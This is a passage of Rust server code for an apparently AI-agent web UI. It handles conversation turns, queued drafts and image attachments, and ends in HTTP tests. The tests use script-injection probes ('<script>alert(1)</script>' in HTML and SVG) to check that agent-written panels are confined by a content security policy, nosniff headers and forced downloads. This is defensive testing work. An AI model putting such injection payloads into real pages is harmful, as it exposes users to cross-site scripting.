3360 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3361 if body.text.trim().is_empty() && body.attachments.is_empty() {
3362 return Err(ApiError::bad_request("say something"));
3363 }
3364
3365 let id = {
3366 let ui = Arc::clone(&ui);
3367 let asked = id.clone();
3368 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3369 };
3370 {
3374 let ui = Arc::clone(&ui);
3375 let id = id.clone();
3376 blocking(move || {
3377 let talk = ui.talks.get(&id)?;
3378 if !talk.status.open() {
3379 return Err(ApiError::conflict(format!(
3380 "talk {} is {} and takes no more turns",
3381 talk.short(),
3382 talk.status.as_str()
3383 )));
3384 }
3385 Ok(())
3386 })
3387 .await?;
3388 }
3389
3390 let attachments = {
3395 let ui = Arc::clone(&ui);
3396 let id = id.clone();
3397 let ids = body.attachments.clone();
3398 blocking(move || {
3399 ids.into_iter()
3400 .map(|att_id| {
3401 ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
3402 ApiError::bad_request(format!("unknown attachment `{att_id}`"))
3403 })
3404 })
3405 .collect::<ApiResult<Vec<talk::Attachment>>>()
3406 })
3407 .await?
3408 };
3409
3410 let start = {
3415 let ui = Arc::clone(&ui);
3416 let id = id.clone();
3417 blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
3418 };
3419 let turn_guard = match start {
3420 TalkTurnStart::Claimed(turn_guard) => turn_guard,
3421 TalkTurnStart::Pending => {
3422 return Err(ApiError::conflict(
3423 "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
3424 ));
3425 }
3426 TalkTurnStart::Busy => {
3427 let (view, reclaimed) = {
3430 let ui = Arc::clone(&ui);
3431 let id = id.clone();
3432 let said = body.text.clone();
3433 blocking(move || {
3434 let mut talk = ui.talks.get(&id)?;
3435 if let Err(error) = talk::queue(&mut talk, &ui.talks, &said, attachments) {
3436 if let Ok(fresh) = ui.talks.get(&id) {
3437 if !fresh.status.open() {
3438 return Err(ApiError::conflict(format!(
3439 "talk {} is {} and takes no more turns",
3440 fresh.short(),
3441 fresh.status.as_str()
3442 )));
3443 }
3444 }
3445 return Err(ApiError::from(error));
3446 }
3447 let claim = match ui.begin_queued_talk_turn(&id)? {
3457 Some(turn_guard) => {
3458 let (cfg, _) = Config::discover(&talk.repo, None)?;
3459 Some((talk.clone(), cfg, turn_guard))
3460 }
3461 None => None,
3462 };
3463 let thinking = ui.is_thinking(&id);
3464 Ok((TalkView::new(talk, thinking), claim))
3465 })
3466 .await?
3467 };
3468 if let Some((talk, cfg, turn_guard)) = reclaimed {
3469 let talks = ui.talks.clone();
3470 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
3471 }
3472 return Ok((StatusCode::ACCEPTED, Json(view)));
3473 }
3474 };
3475
3476 let (talk, cfg) = {
3477 let ui = Arc::clone(&ui);
3478 let id = id.clone();
3479 blocking(move || {
3480 let talk = ui.talks.get(&id)?;
3481 let (cfg, _) = Config::discover(&talk.repo, None)?;
3482 Ok((talk, cfg))
3483 })
3484 .await?
3485 };
3486
3487 let talks = ui.talks.clone();
3488 let text = {
3489 let mut talk = talk.clone();
3490 let talks = talks.clone();
3491 let said = body.text.clone();
3492 blocking(move || {
3493 if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
3494 if let Ok(fresh) = talks.get(&talk.id) {
3495 if !fresh.status.open() {
3496 return Err(ApiError::conflict(format!(
3497 "talk {} is {} and takes no more turns",
3498 fresh.short(),
3499 fresh.status.as_str()
3500 )));
3501 }
3502 }
3503 return Err(ApiError::from(error));
3504 }
3505 Ok(said.trim().to_owned())
3506 })
3507 .await?
3508 };
3509 let talk = {
3512 let ui = Arc::clone(&ui);
3513 let id = id.clone();
3514 blocking(move || Ok(ui.talks.get(&id)?)).await?
3515 };
3516 let queued = talk.clone();
3517 let thinking = ui.is_thinking(&id);
3518 tokio::spawn(async move {
3519 let mut talk = talk;
3520 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
3521 tracing::warn!("talk {id} turn failed: {e:#}");
3524 }
3525 drain_loop(talk, talks, cfg, id, turn_guard).await;
3528 });
3529
3530 Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
3532}
3533
3534async fn talk_pending_resume(
3538 State(ui): State<Arc<Ui>>,
3539 Path(id): Path<String>,
3540) -> ApiResult<(StatusCode, Json<TalkView>)> {
3541 let id = {
3542 let ui = Arc::clone(&ui);
3543 let asked = id.clone();
3544 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3545 };
3546 let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
3547 return Err(ApiError::conflict(
3548 "a talk turn is already running; the queued draft will be handled by it",
3549 ));
3550 };
3551 let (talk, cfg) = {
3552 let ui = Arc::clone(&ui);
3553 let id = id.clone();
3554 blocking(move || {
3555 let talk = ui.talks.get(&id)?;
3556 if !talk.status.open() {
3557 return Err(ApiError::conflict(format!(
3558 "talk {} is {} and takes no more turns",
3559 talk.short(),
3560 talk.status.as_str()
3561 )));
3562 }
3563 if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
3564 return Err(ApiError::conflict("there is no queued draft to resume"));
3565 }
3566 let (cfg, _) = Config::discover(&talk.repo, None)?;
3567 Ok((talk, cfg))
3568 })
3569 .await?
3570 };
3571 let view = TalkView::new(talk.clone(), true);
3572 let talks = ui.talks.clone();
3573 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
3574 Ok((StatusCode::ACCEPTED, Json(view)))
3575}
3576
3577async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
3593 let live_set = Arc::clone(&turn.turns);
3594 let mut turn = Some(turn);
3602 loop {
3603 let observed = live_set
3607 .lock()
3608 .unwrap_or_else(PoisonError::into_inner)
3609 .queued
3610 .get(&id)
3611 .copied()
3612 .unwrap_or(0);
3613 let drained = blocking({
3614 let talks = talks.clone();
3615 move || {
3616 let result = talk::drain(&mut talk, &talks);
3617 Ok((talk, result))
3618 }
3619 })
3620 .await;
3621 let (next_talk, result) = match drained {
3622 Ok(drained) => drained,
3623 Err(e) => {
3624 tracing::warn!(
3625 status = %e.status,
3626 message = %e.message,
3627 "talk {id} could not start queued-text drain"
3628 );
3629 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3630 turn.take()
3631 .expect("held for the whole loop until released here")
3632 .release(&mut live);
3633 break;
3634 }
3635 };
3636 talk = next_talk;
3637 let drained = match result {
3638 Ok(Some(drained)) => drained,
3639 Ok(None) => {
3640 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3641 if live.queued.get(&id).copied().unwrap_or(0) != observed {
3642 continue;
3643 }
3644 turn.take()
3645 .expect("held for the whole loop until released here")
3646 .release(&mut live);
3647 break;
3648 }
3649 Err(e) => {
3650 tracing::warn!("talk {id} could not drain queued text: {e:#}");
3651 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
3652 turn.take()
3653 .expect("held for the whole loop until released here")
3654 .release(&mut live);
3655 break;
3656 }
3657 };
3658 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
3659 tracing::warn!("talk {id} turn failed: {e:#}");
3660 }
3661 }
3662}
3663
3664async fn talk_pending_clear(
3666 State(ui): State<Arc<Ui>>,
3667 Path(id): Path<String>,
3668 body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
3669) -> ApiResult<Json<TalkView>> {
3670 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3671 blocking(move || {
3672 let id = resolve_talk(&ui.talks, &id)?;
3673 let mut talk = ui.talks.get(&id)?;
3674 if !talk.status.open() {
3675 return Err(ApiError::conflict(format!(
3676 "talk {} is {} and takes no more turns",
3677 talk.short(),
3678 talk.status.as_str()
3679 )));
3680 }
3681 if !talk::clear_pending_if_matches(
3682 &mut talk,
3683 &ui.talks,
3684 &body.expected_text,
3685 &body.expected_attachments,
3686 )? {
3687 return Err(ApiError::conflict(
3688 "queued message changed; reload it before clearing",
3689 ));
3690 }
3691 let thinking = ui.is_thinking(&talk.id);
3692 Ok(Json(TalkView::new(talk, thinking)))
3693 })
3694 .await
3695}
3696
3697async fn talk_pending_edit(
3701 State(ui): State<Arc<Ui>>,
3702 Path(id): Path<String>,
3703 body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
3704) -> ApiResult<Json<TalkView>> {
3705 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3706 let (view, reclaimed) = blocking({
3707 let ui = Arc::clone(&ui);
3708 move || {
3709 let id = resolve_talk(&ui.talks, &id)?;
3710 let mut talk = ui.talks.get(&id)?;
3711 if !talk.status.open() {
3712 return Err(ApiError::conflict(format!(
3713 "talk {} is {} and takes no more turns",
3714 talk.short(),
3715 talk.status.as_str()
3716 )));
3717 }
3718 if !talk::edit_pending_text(
3719 &mut talk,
3720 &ui.talks,
3721 &body.text,
3722 &body.expected_text,
3723 &body.expected_attachments,
3724 )? {
3725 return Err(ApiError::conflict(
3726 "queued message changed; reload it before editing",
3727 ));
3728 }
3729 let claim = match ui.begin_queued_talk_turn(&id)? {
3730 Some(turn_guard) => {
3731 let (cfg, _) = Config::discover(&talk.repo, None)?;
3732 Some((talk.clone(), cfg, id.clone(), turn_guard))
3733 }
3734 None => None,
3735 };
3736 let thinking = ui.is_thinking(&id);
3737 Ok((TalkView::new(talk, thinking), claim))
3738 }
3739 })
3740 .await?;
3741 if let Some((talk, cfg, id, turn_guard)) = reclaimed {
3742 let talks = ui.talks.clone();
3743 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
3744 }
3745 Ok(Json(view))
3746}
3747
3748async fn talk_close(
3750 State(ui): State<Arc<Ui>>,
3751 Path(id): Path<String>,
3752) -> ApiResult<Json<TalkView>> {
3753 blocking(move || {
3754 let id = resolve_talk(&ui.talks, &id)?;
3755 let mut talk = ui.talks.get(&id)?;
3756 talk::close(&mut talk, &ui.talks)?;
3757 let thinking = ui.is_thinking(&talk.id);
3758 Ok(Json(TalkView::new(talk, thinking)))
3759 })
3760 .await
3761}
3762
3763async fn talk_reopen(
3765 State(ui): State<Arc<Ui>>,
3766 Path(id): Path<String>,
3767) -> ApiResult<Json<TalkView>> {
3768 blocking(move || {
3769 let id = resolve_talk(&ui.talks, &id)?;
3770 let mut talk = ui.talks.get(&id)?;
3771 talk::reopen(&mut talk, &ui.talks)?;
3772 let thinking = ui.is_thinking(&talk.id);
3773 Ok(Json(TalkView::new(talk, thinking)))
3774 })
3775 .await
3776}
3777
3778async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
3788 blocking(move || {
3789 let id = resolve_talk(&ui.talks, &id)?;
3790 ui.talks.remove(&id)?;
3791 Ok(StatusCode::NO_CONTENT)
3792 })
3793 .await
3794}
3795
3796fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
3798 pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
3799}
3800
3801async fn talk_attachment_post(
3804 State(ui): State<Arc<Ui>>,
3805 Path(id): Path<String>,
3806 headers: HeaderMap,
3807 body: Bytes,
3808) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
3809 let mime = validate_attachment(&headers, &body)?;
3810 let name = filename_header(&headers);
3811 let data = body.to_vec();
3812 blocking(move || {
3813 let id = resolve_talk(&ui.talks, &id)?;
3814 let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
3815 Ok((StatusCode::CREATED, Json(att)))
3816 })
3817 .await
3818}
3819
3820async fn talk_attachment_get(
3823 State(ui): State<Arc<Ui>>,
3824 Path((id, att)): Path<(String, String)>,
3825) -> ApiResult<Response> {
3826 blocking(move || {
3827 let id = resolve_talk(&ui.talks, &id)?;
3828 let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
3829 return Err(ApiError::not_found(format!(
3830 "talk {id} has no attachment `{att}`"
3831 )));
3832 };
3833 Ok(attachment_response(&meta.mime, data))
3834 })
3835 .await
3836}
3837
3838fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
3849 if data.len() > ATTACHMENT_MAX_BYTES {
3850 return Err(ApiError::bad_request(format!(
3851 "attachment is {} bytes, over the {} MiB limit",
3852 data.len(),
3853 ATTACHMENT_MAX_BYTES / (1024 * 1024)
3854 ))
3855 .with_status(StatusCode::PAYLOAD_TOO_LARGE));
3856 }
3857 if data.is_empty() {
3858 return Err(ApiError::bad_request("attachment is empty"));
3859 }
3860 let declared = declared_mime(headers)?;
3861 match sniffed_mime(data) {
3862 Some(sniffed) if sniffed == declared => Ok(declared),
3863 Some(sniffed) => Err(ApiError::bad_request(format!(
3864 "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
3865 ))),
3866 None => Err(ApiError::bad_request(
3867 "the file's bytes do not match any accepted image format",
3868 )),
3869 }
3870}
3871
3872fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
3876 let raw = headers
3877 .get(header::CONTENT_TYPE)
3878 .and_then(|v| v.to_str().ok())
3879 .unwrap_or("")
3880 .split(';')
3881 .next()
3882 .unwrap_or("")
3883 .trim()
3884 .to_ascii_lowercase();
3885 ATTACHMENT_MIME_WHITELIST
3886 .iter()
3887 .find(|&&m| m == raw)
3888 .copied()
3889 .ok_or_else(|| {
3890 if raw == "image/svg+xml" {
3891 ApiError::bad_request(
3892 "SVG is not accepted: it can carry active content (e.g. a <script>), \
3893 not just a picture",
3894 )
3895 } else if raw.is_empty() {
3896 ApiError::bad_request("Content-Type is required for an attachment upload")
3897 } else {
3898 ApiError::bad_request(format!(
3899 "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
3900 image/gif or image/webp"
3901 ))
3902 }
3903 })
3904}
3905
3906fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
3909 if data.starts_with(b"\x89PNG\r\n\x1a\n") {
3910 Some("image/png")
3911 } else if data.starts_with(b"\xff\xd8\xff") {
3912 Some("image/jpeg")
3913 } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
3914 Some("image/gif")
3915 } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
3916 Some("image/webp")
3917 } else {
3918 None
3919 }
3920}
3921
3922fn filename_header(headers: &HeaderMap) -> String {
3928 headers
3929 .get(FILENAME_HEADER)
3930 .and_then(|v| v.to_str().ok())
3931 .map(str::trim)
3932 .filter(|s| !s.is_empty())
3933 .unwrap_or("attachment")
3934 .to_owned()
3935}
3936
3937fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
3944 let content_type = ATTACHMENT_MIME_WHITELIST
3945 .iter()
3946 .find(|&&m| m == mime)
3947 .copied()
3948 .unwrap_or("application/octet-stream");
3949 (
3950 [
3951 (header::CONTENT_TYPE, content_type),
3952 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3953 ],
3954 body,
3955 )
3956 .into_response()
3957}
3958
3959async fn config_for(repo: &FsPath) -> ApiResult<Config> {
3967 let repo = repo.to_path_buf();
3968 blocking(move || {
3969 let (cfg, _) = Config::discover(&repo, None)?;
3970 Ok(cfg)
3971 })
3972 .await
3973}
3974
3975fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
3981 let mut hits = ids
3982 .into_iter()
3983 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
3984 match (hits.next(), hits.next()) {
3985 (Some(one), None) => Ok(one),
3986 (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
3987 (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
3988 "`{prefix}` matches more than one {what}, including {a} and {b}"
3989 ))),
3990 }
3991}
3992
3993#[cfg(test)]
3994mod tests {
3995 use pretty_assertions::assert_eq;
3996 use serde_json::Value;
3997 use tempfile::TempDir;
3998 use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
3999
4000 use super::*;
4001 use crate::config::Config;
4002 use crate::queue::{Source, TaskStatus};
4003
4004 struct Fixture {
4010 home: TempDir,
4011 addr: SocketAddr,
4012 }
4013
4014 impl Fixture {
4015 async fn start() -> Self {
4016 Self::with_loop(launch_idle).await
4017 }
4018
4019 async fn with_loop(launch: Launch) -> Self {
4021 let home = TempDir::new().expect("temp home");
4022 let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4023 Self { home, addr }
4024 }
4025
4026 async fn with_repo(repo: PathBuf) -> Self {
4030 let home = TempDir::new().expect("temp home");
4031 let addr = Self::serve(home.path(), repo, launch_idle).await;
4032 Self { home, addr }
4033 }
4034
4035 async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4036 let queue = Queue::at(home.join("queue"));
4037 let runs = home.join("runs");
4038 std::fs::create_dir_all(&runs).expect("runs dir");
4039 let worktrees = home.join("wt").join("magi");
4040 std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4041 let ui = Ui::new(
4042 queue,
4043 Questions::at(home.join("questions")),
4044 Talks::at(home.join("talks")),
4045 runs,
4046 home.to_path_buf(),
4047 repo,
4048 )
4049 .with_worktrees_root(worktrees)
4050 .with_launch(launch);
4051 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4052 .await
4053 .expect("bind loopback");
4054 let addr = listener.local_addr().expect("local addr");
4055 tokio::spawn(async move {
4056 let _ = axum::serve(listener, ui.router()).await;
4057 });
4058 addr
4059 }
4060
4061 fn queue(&self) -> Queue {
4062 Queue::at(self.home.path().join("queue"))
4063 }
4064
4065 fn questions(&self) -> Questions {
4066 Questions::at(self.home.path().join("questions"))
4067 }
4068
4069 fn talks(&self) -> Talks {
4070 Talks::at(self.home.path().join("talks"))
4071 }
4072
4073 fn runs(&self) -> PathBuf {
4074 self.home.path().join("runs")
4075 }
4076
4077 async fn get(&self, path: &str) -> Res {
4078 request(self.addr, "GET", path, None).await
4079 }
4080
4081 async fn head(&self, path: &str) -> Res {
4086 request(self.addr, "HEAD", path, None).await
4087 }
4088
4089 async fn post(&self, path: &str, body: Option<&str>) -> Res {
4090 request(self.addr, "POST", path, body).await
4091 }
4092
4093 async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4094 request_with(self.addr, "GET", path, None, extra).await
4095 }
4096
4097 async fn delete(&self, path: &str) -> Res {
4098 request(self.addr, "DELETE", path, None).await
4099 }
4100
4101 async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4103 request_bytes(self.addr, path, headers, body).await
4104 }
4105 }
4106
4107 struct Res {
4108 status: u16,
4109 headers: String,
4110 head: String,
4115 body: String,
4116 bytes: Vec<u8>,
4120 }
4121
4122 impl Res {
4123 fn json(&self) -> Value {
4124 serde_json::from_str(&self.body)
4125 .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4126 }
4127
4128 fn header(&self, name: &str) -> Option<&str> {
4130 self.head.lines().find_map(|line| {
4131 let (key, value) = line.split_once(':')?;
4132 key.trim()
4133 .eq_ignore_ascii_case(name)
4134 .then(|| value.trim_start().trim_end_matches('\r'))
4135 })
4136 }
4137 }
4138
4139 async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4142 request_with(addr, method, path, body, &[]).await
4143 }
4144
4145 async fn request_with(
4149 addr: SocketAddr,
4150 method: &str,
4151 path: &str,
4152 body: Option<&str>,
4153 extra: &[(&str, &str)],
4154 ) -> Res {
4155 let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4156 for (name, value) in extra {
4157 head.push_str(&format!("{name}: {value}\r\n"));
4158 }
4159 if let Some(body) = body {
4160 head.push_str("Content-Type: application/json\r\n");
4161 head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4162 }
4163 head.push_str("\r\n");
4164 if let Some(body) = body {
4165 head.push_str(body);
4166 }
4167 let mut socket = tokio::net::TcpStream::connect(addr)
4168 .await
4169 .expect("connect to the test server");
4170 socket
4171 .write_all(head.as_bytes())
4172 .await
4173 .expect("write request");
4174 let mut raw = Vec::new();
4175 socket.read_to_end(&mut raw).await.expect("read response");
4176 let split = raw
4179 .windows(4)
4180 .position(|w| w == b"\r\n\r\n")
4181 .expect("a header block");
4182 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4183 let bytes = raw[split + 4..].to_vec();
4184 let status = head
4185 .lines()
4186 .next()
4187 .and_then(|line| line.split_whitespace().nth(1))
4188 .and_then(|code| code.parse().ok())
4189 .expect("a status line");
4190 Res {
4191 status,
4192 headers: head.to_lowercase(),
4193 head,
4194 body: String::from_utf8_lossy(&bytes).into_owned(),
4195 bytes,
4196 }
4197 }
4198
4199 async fn request_bytes(
4205 addr: SocketAddr,
4206 path: &str,
4207 headers: &[(&str, &str)],
4208 body: &[u8],
4209 ) -> Res {
4210 let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4211 for (name, value) in headers {
4212 head.push_str(&format!("{name}: {value}\r\n"));
4213 }
4214 head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
4215 let mut socket = tokio::net::TcpStream::connect(addr)
4216 .await
4217 .expect("connect to the test server");
4218 socket
4219 .write_all(head.as_bytes())
4220 .await
4221 .expect("write request head");
4222 socket.write_all(body).await.expect("write request body");
4223 let mut raw = Vec::new();
4224 socket.read_to_end(&mut raw).await.expect("read response");
4225 let split = raw
4226 .windows(4)
4227 .position(|w| w == b"\r\n\r\n")
4228 .expect("a header block");
4229 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4230 let bytes = raw[split + 4..].to_vec();
4231 let status = head
4232 .lines()
4233 .next()
4234 .and_then(|line| line.split_whitespace().nth(1))
4235 .and_then(|code| code.parse().ok())
4236 .expect("a status line");
4237 Res {
4238 status,
4239 headers: head.to_lowercase(),
4240 head,
4241 body: String::from_utf8_lossy(&bytes).into_owned(),
4242 bytes,
4243 }
4244 }
4245
4246 fn write_run(runs: &FsPath, id: &str, status: RunStatus) {
4248 let mut state = RunState::new(
4249 PathBuf::from("/repo/magi"),
4250 "main".to_owned(),
4251 "0123456789abcdef".to_owned(),
4252 "Add a web UI\n\nMobile first.".to_owned(),
4253 Config::default(),
4254 );
4255 state.id = id.to_owned();
4256 state.status = status;
4257 let dir = runs.join(id);
4258 std::fs::create_dir_all(&dir).expect("run dir");
4259 std::fs::write(
4260 dir.join("run.json"),
4261 serde_json::to_string_pretty(&state).expect("serialize run"),
4262 )
4263 .expect("write run.json");
4264 }
4265
4266 fn write_daemon(home: &FsPath, updated_at: Timestamp) {
4267 let body = serde_json::json!({
4268 "schema": 1,
4269 "pid": 4242,
4270 "started_at": Timestamp::now().to_string(),
4271 "updated_at": updated_at.to_string(),
4272 "idle": false,
4273 "current": [{ "task": "20260902-140501-aaaa", "run": "20260902-140502-bbbb" }],
4274 "completed": 7,
4275 "polls": 143,
4276 });
4277 std::fs::write(home.join("daemon.json"), body.to_string()).expect("write daemon.json");
4278 }
4279
4280 fn launch_idle(
4290 _opts: daemon::Opts,
4291 stop: daemon::Stop,
4292 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4293 Box::pin(async move {
4294 while !stop.stopped() {
4295 tokio::time::sleep(Duration::from_millis(2)).await;
4296 }
4297 Ok(())
4298 })
4299 }
4300
4301 fn launch_broken(
4304 _opts: daemon::Opts,
4305 _stop: daemon::Stop,
4306 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4307 Box::pin(async {
4308 Err(anyhow::anyhow!(
4309 "publish the daemon status file: read-only file system"
4310 ))
4311 })
4312 }
4313
4314 static PARK_KNOCK: std::sync::Mutex<Option<SocketAddr>> = std::sync::Mutex::new(None);
4321 static PARK_HEARD: std::sync::Mutex<Option<u16>> = std::sync::Mutex::new(None);
4322
4323 fn launch_knocking_on_the_way_out(
4330 _opts: daemon::Opts,
4331 stop: daemon::Stop,
4332 ) -> Pin<Box<dyn Future<Output = Result<()>> + Send>> {
4333 Box::pin(async move {
4334 while !stop.stopped() {
4335 tokio::time::sleep(Duration::from_millis(2)).await;
4336 }
4337 let addr = PARK_KNOCK
4338 .lock()
4339 .expect("park knock")
4340 .expect("the test set an address");
4341 let heard = request(addr, "GET", "/api/health", None).await.status;
4342 *PARK_HEARD.lock().expect("park heard") = Some(heard);
4343 Ok(())
4344 })
4345 }
4346
4347 async fn settled(fx: &Fixture, want: fn(&Value) -> bool) -> Value {
4355 for _ in 0..200 {
4356 let view = fx.get("/api/loop").await.json();
4357 if want(&view) {
4358 return view;
4359 }
4360 tokio::time::sleep(Duration::from_millis(10)).await;
4361 }
4362 panic!(
4363 "the loop never settled: {}",
4364 fx.get("/api/loop").await.json()
4365 );
4366 }
4367
4368 fn ask(fx: &Fixture, summary: &str, choices: &[&str]) -> String {
4370 let store = fx.questions();
4371 let mut q = Question::new(
4372 "20260902-000000-beef".to_owned(),
4373 "implement".to_owned(),
4374 "impl-A".to_owned(),
4375 summary.to_owned(),
4376 "because it matters".to_owned(),
4377 choices.iter().map(|c| (*c).to_owned()).collect(),
4378 );
4379 store.put(&mut q).expect("put question");
4380 q.id
4381 }
4382
4383 fn panel(fx: &Fixture, html: &str, assets: &[(&str, &[u8])]) -> String {
4389 let store = fx.questions();
4390 let mut q = Question::new(
4391 "20260902-000000-beef".to_owned(),
4392 "land".to_owned(),
4393 "fix".to_owned(),
4394 "Merge this?".to_owned(),
4395 "the diff is in the panel".to_owned(),
4396 vec!["merge".to_owned(), "hold".to_owned()],
4397 );
4398 let staging = fx.home.path().join("staging");
4401 std::fs::create_dir_all(&staging).expect("staging dir");
4402 let sources: Vec<PathBuf> = assets
4403 .iter()
4404 .map(|(name, bytes)| {
4405 let path = staging.join(name);
4406 std::fs::write(&path, bytes).expect("write staged asset");
4407 path
4408 })
4409 .collect();
4410 store
4411 .put_panel(&mut q, html, &sources)
4412 .expect("write the panel");
4413 store.put(&mut q).expect("put question");
4414 q.id
4415 }
4416
4417 fn seed_talk(fx: &Fixture, id: &str, status: &str) -> String {
4426 let store = fx.talks();
4427 std::fs::create_dir_all(store.root()).expect("talks dir");
4428 let seat = serde_json::to_value(crate::agent::SeatState::new("talk", "mock", 7))
4429 .expect("serialize a seat");
4430 let body = serde_json::json!({
4431 "schema": 1,
4432 "id": id,
4433 "repo": "/repo/magi",
4434 "agent": "mock",
4435 "status": status,
4436 "turns": [],
4437 "created_at": Timestamp::now().to_string(),
4438 "updated_at": Timestamp::now().to_string(),
4439 "seat": seat,
4440 });
4441 std::fs::write(store.path_of(id), body.to_string()).expect("write the talk");
4442 store.get(id).expect("the seeded talk has to be readable");
4443 id.to_owned()
4444 }
4445
4446 #[tokio::test]
4447 async fn both_panel_routes_send_the_whole_policy_that_makes_agent_html_safe() {
4448 let fx = Fixture::start().await;
4449 let id = panel(
4450 &fx,
4451 "<h1>Merge?</h1><img src=\"diff.svg\">",
4452 &[("diff.svg", b"<svg xmlns='http://www.w3.org/2000/svg'/>")],
4453 );
4454
4455 for path in [
4456 format!("/api/questions/{id}/panel"),
4457 format!("/api/questions/{id}/asset/diff.svg"),
4458 ] {
4459 let res = fx.get(&path).await;
4460 assert_eq!(res.status, 200, "{path}: {}", res.body);
4461 assert_eq!(
4467 res.header("content-security-policy"),
4468 Some(
4469 "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
4470 font-src data:; base-uri 'none'; form-action 'none'; \
4471 frame-ancestors 'self'"
4472 ),
4473 "{path} is the only thing between a hostile panel and the tailnet"
4474 );
4475 assert_eq!(
4476 res.header("x-content-type-options"),
4477 Some("nosniff"),
4478 "{path}: a browser must not re-decide the type we sent"
4479 );
4480 assert_eq!(
4481 res.header("referrer-policy"),
4482 Some("no-referrer"),
4483 "{path}: a panel must not leak the question id off the machine"
4484 );
4485
4486 let pre = fx.head(&path).await;
4491 assert_eq!(pre.status, res.status, "{path}: HEAD must agree with GET");
4492 assert_eq!(
4493 pre.header("content-security-policy"),
4494 res.header("content-security-policy"),
4495 "{path}: the preflight carries the same policy"
4496 );
4497 assert_eq!(
4498 pre.header("content-type"),
4499 res.header("content-type"),
4500 "{path}: the preflight carries the same type"
4501 );
4502 }
4503 }
4504
4505 #[tokio::test]
4506 async fn a_panel_reaches_the_browser_byte_for_byte() {
4507 let fx = Fixture::start().await;
4508 let html = "<h1>Merge?</h1><p>a < b — 変更</p><script>alert(1)</script>";
4513 let id = panel(&fx, html, &[]);
4514
4515 let res = fx.get(&format!("/api/questions/{id}/panel")).await;
4516
4517 assert_eq!(res.status, 200);
4518 assert_eq!(res.bytes, html.as_bytes(), "served verbatim, not sanitised");
4519 assert_eq!(res.header("content-type"), Some("text/html; charset=utf-8"));
4520 assert_eq!(
4521 res.header("content-disposition"),
4522 None,
4523 "the panel itself is rendered in the frame, not downloaded"
4524 );
4525 }
4526
4527 #[tokio::test]
4528 async fn an_svg_asset_is_a_download_and_a_png_is_not() {
4529 let fx = Fixture::start().await;
4530 let svg = b"<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>";
4531 let png = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR".as_slice();
4532 let id = panel(
4533 &fx,
4534 "<img src=\"diff.svg\"><img src=\"shot.png\">",
4535 &[("diff.svg", svg), ("shot.png", png)],
4536 );
4537
4538 let as_svg = fx.get(&format!("/api/questions/{id}/asset/diff.svg")).await;
4539 let as_png = fx.get(&format!("/api/questions/{id}/asset/shot.png")).await;
4540
4541 assert_eq!(as_svg.status, 200);
4542 assert_eq!(as_svg.header("content-type"), Some("image/svg+xml"));
4543 assert_eq!(as_svg.header("content-disposition"), Some("attachment"));
4548
4549 assert_eq!(as_png.status, 200);
